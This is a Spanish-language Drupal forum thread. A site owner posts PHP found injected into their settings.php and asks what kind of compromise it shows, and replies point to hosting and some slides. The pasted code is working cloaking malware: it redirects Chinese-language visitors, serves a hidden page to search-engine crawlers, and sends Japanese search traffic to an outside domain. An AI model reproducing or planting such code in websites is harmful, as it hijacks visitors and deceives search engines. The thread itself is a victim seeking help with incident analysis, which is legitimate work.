Posted by jonn59 on October 10, 2017 at 1:51am
Hola a todos, recurro a ustedes por una situacion de seguridad que se me presento en mi plataforma Drupal 7,
Recientemente habilite un certificado para tener conexiones seguras(Https) pero al ingresar a mi archivo settings.php a realizar unos cambios me lleve la sorpresa de que habia una serie de lineas no propias de la instalación de Drupal, las lineas extrañsa son las siguientes:
<?php
$lan = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
if (preg_match ( '/zh-cn/i', $lan)){
$url = 'http://www.baidu.com/';
header("location: " . $url);
exit();
}
error_reporting(0);
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
$rf=$_SERVER['HTTP_REFERER'];
$botchar = "/(googlebot|slurp|adsense)/";
if(preg_match($botchar, $ua)) {
$file = file_get_contents('sites/default/xxx.html');
echo $file;
exit;
}
if(stripos($rf,"yahoo.co.jp") || stripos($rf,"google.co.jp") || stripos($rf,"docomo.ne.jp"))
{
Header("Location: http://www.copy2017.org/");
exit;
}
?>
Alguien podria darme luz que tipo de modificación realizaron en mi plataforma Drupal?
Comments
Hola, donde lo tienes
Hola, donde lo tienes hospedado?
En un servidor interno de la
En un servidor interno de la UNAM
Checate estas
Checate estas slides
https://docs.google.com/presentation/d/1e0XnJRHJh8gDQjHYht_qYsFHiX2AEl5O...
Gracias, lo revisare
Gracias, lo revisare